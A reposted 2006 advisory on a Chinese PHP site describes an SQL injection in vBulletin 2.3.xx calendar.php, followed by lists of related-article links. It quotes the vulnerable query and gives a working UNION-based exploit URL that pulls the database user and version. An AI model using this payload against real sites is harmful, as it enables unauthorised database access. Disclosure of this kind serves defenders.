编程 PHP

vBulletin Forum 2.3.xx SQL Injection

Posted in PHP onOctober 09, 2006

vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.

vBulletin Forum 2.3.xx SQL Injection

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

PHP在特殊字符前加斜杠的实现代码

Jul 17 PHP

php 定义404页面的实现代码

Nov 19 PHP

PHP解决URL中文GBK乱码问题的两种方法

Jun 03 PHP

set_exception_handler函数在ThinkPHP中的用法

Oct 31 PHP

php基于str_pad实现卡号不足位数自动补0的方法

Nov 12 PHP

PHP中key和current,next的联合运用实例分析

Mar 29 PHP

简单谈谈PHP中的include、include_once、require以及require_once语句

Apr 23 PHP

PHP连接MySQL进行增、删、改、查操作

Feb 19 PHP

ThinkPHP删除栏目(实现批量删除栏目)

Jun 21 PHP

PHP使用栈解决约瑟夫环问题算法示例

Aug 27 PHP

PHP判断是否是微信打开,浏览器打开的方法

Mar 14 PHP

laravel框架实现敏感词汇过滤功能示例

Feb 15 PHP

PHP_Flame(Version:Progress)的原代码

Oct 09 #PHP

图形数字验证代码

Oct 09 #PHP

用PHP函数解决SQL injection

Oct 09 #PHP

session 的生命周期是多长

Oct 09 #PHP

做个自己站内搜索引擎

Oct 09 #PHP

用libTemplate实现静态网页的生成

Oct 09 #PHP

php注入实例

Oct 09 #PHP

You might like

php中看实例学正则表达式

2006/12/25 PHP

利用PHP扩展vld查看PHP opcode操作步骤

2013/03/04 PHP

php生成扇形比例图实例

2013/11/06 PHP

phpphp图片采集后按原路径保存图片示例

2014/02/18 PHP

php数组添加元素方法小结

2014/12/20 PHP

php中static和const关键字用法分析

2016/12/07 PHP

Add Formatted Data to a Spreadsheet

2007/06/12 Javascript

js或css实现滚动广告的几种方案

2010/01/28 Javascript

jQuery获取浏览器中的分辨率实现代码

2013/04/23 Javascript

js 本地预览的简单实现方法

2014/02/18 Javascript

jQuery简单实现网页选项卡特效

2014/11/24 Javascript

javascript获取当前鼠标坐标的方法

2015/01/10 Javascript

在页面中输出当前客户端时间javascript实例代码

2016/03/02 Javascript

JavaScript实现复制或剪切内容到剪贴板功能的方法

2016/05/23 Javascript

jQuery UI结合Ajax创建可定制的Web界面

2016/06/22 Javascript

JS自定义函数对web前端上传的文件进行类型大小判断

2016/10/19 Javascript

微信小程序地图（map）实例详解

2016/11/16 Javascript

详解为Angular.js内置$http服务添加拦截器的方法

2016/12/20 Javascript

原生ajax处理json格式数据的实例代码

2016/12/25 Javascript

jQuery中Datatables增加跳转到指定页功能

2017/02/08 Javascript

浅析vue给不同环境配置不同打包命令

2018/08/17 Javascript

实例分析vue循环列表动态数据的处理方法

2018/09/28 Javascript

DataFrame中去除指定列为空的行方法

2018/04/08 Python

Pycharm如何打断点的方法步骤

2019/06/13 Python

对Django项目中的ORM映射与模糊查询的使用详解

2019/07/18 Python

python3 deque 双向队列创建与使用方法分析

2020/03/24 Python

python pymysql链接数据库查询结果转为Dataframe实例

2020/06/05 Python

Python如何对齐字符串

2020/07/30 Python

python解包概念及实例

2021/02/17 Python

CSS3中的opacity属性使用教程

2015/08/19 HTML / CSS

教育实习生的自我评价分享

2013/11/21 职场文书

仓库主管的岗位职责

2013/12/04 职场文书

公司授权委托书格式样本

2014/10/01 职场文书

企业与个人合作经营协议书

2014/11/01 职场文书

Java org.w3c.dom.Document 类方法引用报错

2021/08/07 Java/Android

如何用H5实现好玩的2048小游戏

2022/07/23 HTML / CSS